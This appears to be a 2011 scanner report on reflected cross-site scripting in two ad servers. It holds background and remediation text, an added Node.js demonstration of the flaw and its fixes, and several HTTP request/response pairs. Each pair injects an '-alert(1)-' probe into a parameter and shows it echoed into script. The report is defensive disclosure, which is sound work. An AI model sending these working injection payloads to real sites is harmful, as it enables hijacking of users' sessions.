Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
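The pattern behind the findings below (a request parameter copied into the double-quoted JavaScript string `rm_url = "...&<name>=1..."`) next to two fixes drawn from the remediation background, as an added Node.js example that is not code from this report or from the scanned ad servers. The placeholder host `ad.example`, the render functions and the stubbed `alert`/`document` are constructed for this example; the probe string is the one quoted in finding 1.1.

```javascript
// Added example, not code from the scanner report or the scanned ad servers.
// It mirrors the finding's pattern (a request parameter copied into the
// double-quoted JS string `rm_url = "...&<name>=1..."`), shows two fixes from
// the remediation background, and replays the report's probe payload through
// a stubbed browser to check which variant still executes it.

// Probe payload quoted in finding 1.1 of the report.
const PROBE = 'cd0e3"-alert(1)-"c4c905c666e';

// HTML-encode per the remediation background: & < > " ' and = become entities.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '=': '&#x3D;' };
  return String(s).replace(/[&<>"'=]/g, (c) => map[c]);
}

// Inverse of htmlEncode, used only by the fake `document` below so the stub
// exposes what a real browser would return through `dataset`.
function htmlDecode(s) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>',
                '&quot;': '"', '&#x27;': "'", '&#x3D;': '=' };
  return s.replace(/&(?:amp|lt|gt|quot|#x27|#x3D);/g, (e) => map[e]);
}

// Emit a value as a JS string literal that is safe inside a <script> block.
// JSON.stringify escapes quotes and backslashes; the second pass escapes the
// characters the HTML parser cares about (so "</script>" cannot close the
// block) and the two line terminators JSON leaves raw.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Vulnerable: the parameter name lands inside the quoted string unmodified.
// `ad.example` is a placeholder host for this example.
function renderVulnerable(paramName) {
  return `<script>var rm_url = "http://ad.example/imp?Z=300x250&${paramName}=1";</script>`;
}

// Fix 1: keep the script context but write the value as a proper literal and
// URL-encode it at runtime, since it is used as a query-string name.
function renderEncodedLiteral(paramName) {
  return '<script>var rm_url = "http://ad.example/imp?Z=300x250&" + ' +
    `encodeURIComponent(${jsStringLiteral(paramName)}) + "=1";</script>`;
}

// Fix 2 (what the report prefers: avoid echoing into script context at all):
// HTML-encode the value into a data attribute and read it via the DOM.
function renderDataAttribute(paramName) {
  return `<div id="ad" data-param="${htmlEncode(paramName)}"></div>` +
    '<script>var rm_url = "http://ad.example/imp?Z=300x250&" + ' +
    'encodeURIComponent(document.getElementById("ad").dataset.param) + "=1";' +
    '</script>';
}

// Stubbed browser: run every <script> block in the HTML with `alert` replaced
// by a spy and `document` replaced by a one-element fake. Reports whether
// alert fired, the final rm_url, and how many blocks failed to parse (a
// broken-out string usually leaves one unparseable fragment behind).
function runScripts(html) {
  const attr = /data-param="([^"]*)"/.exec(html);
  const fakeDocument = {
    getElementById: () => ({ dataset: { param: attr ? htmlDecode(attr[1]) : undefined } }),
  };
  const result = { alertFired: false, rmUrl: undefined, syntaxErrors: 0 };
  const re = /<script>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    try {
      const fn = new Function('alert', 'document',
        m[1] + '\nreturn typeof rm_url === "undefined" ? undefined : rm_url;');
      result.rmUrl = fn(() => { result.alertFired = true; }, fakeDocument);
    } catch (e) {
      if (!(e instanceof SyntaxError)) throw e;
      result.syntaxErrors += 1;
    }
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const render of [renderVulnerable, renderEncodedLiteral, renderDataAttribute]) {
    console.log(render.name, runScripts(render(PROBE)));
  }
}
```

Only the vulnerable variant fires the stubbed `alert`; both fixes yield the same `rm_url` with the probe carried as an inert, percent-encoded parameter name.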
1.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.adnetinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd0e3"-alert(1)-"c4c905c666e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=1415802\&cd0e3"-alert(1)-"c4c905c666e=1 HTTP/1.1
Host: ad.adnetinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:03:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 19:03:48 GMT
Pragma: no-cache
Content-Length: 4669
Age: 0
Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adnetinteractive.com/imp?Z=300x250&cd0e3"-alert(1)-"c4c905c666e=1&s=1415802%5c&_salt=4264763177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array(); ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cd8"-alert(1)-"b9616ec1409 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4862
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:01 GMT
Expires: Thu, 03 Feb 2011 18:54:01 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Ghlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409https://insurance.lowermybills.com/auto/?sourceid=57808600-233911573-40497630"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 728; var winH ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe3a4"-alert(1)-"4f02e128fb4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Td3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; va ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5975c"-alert(1)-"1d646e7eef8 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var win ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbf3"-alert(1)-"7f571aed142 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... mFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7284c"-alert(1)-"82b821f28bc was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4870
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... X2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40567083"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9b3"-alert(1)-"8421c6bfdc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
